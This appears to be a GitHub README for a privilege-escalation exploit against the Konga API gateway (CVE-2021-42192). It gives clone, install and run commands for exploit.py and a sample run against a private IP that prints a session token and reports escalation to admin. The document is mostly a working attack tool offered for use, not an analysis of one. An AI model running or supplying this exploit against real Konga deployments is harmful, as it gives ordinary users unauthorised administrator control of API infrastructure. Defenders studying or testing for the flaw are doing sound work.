Konga Privilege Escalation - CVE-2021-42192

Authenticated Privilege Escalation In Konga API Gateway

Description

A bug in Konga API Gateways allows any Authenticated user to escalate to Admin by sending a specially crafted request.

Usage

• First Clone the repository and make the script executable:

$ git clone https://github.com/whokilleddb/Konga-Privilege-Escalation-Exploit
$ cd Konga-Privilege-Escalation-Exploit
$ sudo pip3 install -r requirements.txt
$ chmod +x exploit.py
$ ./exploit.py --help                                                                                              2:21
[~] Konga Privilege Escalation by @whokilleddb
usage: exploit.py [-h] -U Username -P Password URL

positional arguments:
  URL          Base URL(Including Port)

optional arguments:
  -h, --help   show this help message and exit
  -U Username  Username For Authentication
  -P Password  Password For Authentication

• Then run the exploit by providing the username and password. Example:

$ ./exploit.py -U user -P password http://192.168.0.104:1337                                                    2:30
[~] Konga Privilege Escalation by @whokilleddb
[+] Target Info:
+----------+----------------------------+
| URL      | http://192.168.0.104:1337/ |
+----------+----------------------------+
| Username | user                       |
+----------+----------------------------+
| Password | password                   |
+----------+----------------------------+

[+] User ID: 2
[+] Token Found As: eyJhbGciOiJIUzI1NiJ9.Mg._bgkwMqrKxFvVhupixHLIfvF5WpbihENyFpTQN5Eito
[+] Successfully Escalated To ADMIN
[+] Remember To Refresh The Page!

Before	After